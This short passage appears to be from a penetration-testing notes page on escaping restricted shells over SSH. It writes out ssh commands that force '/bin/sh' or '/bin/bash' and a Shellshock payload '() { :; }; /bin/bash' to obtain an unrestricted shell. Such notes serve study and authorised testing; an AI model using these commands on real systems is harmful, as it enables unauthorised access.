There is other methods available if that first one fails:
ssh username@IP -t “/bin/sh” or “/bin/bash” ssh username@IP -t “() { :; }; /bin/bash” (Shellshock)
Last updated 4 years ago
Was this helpful?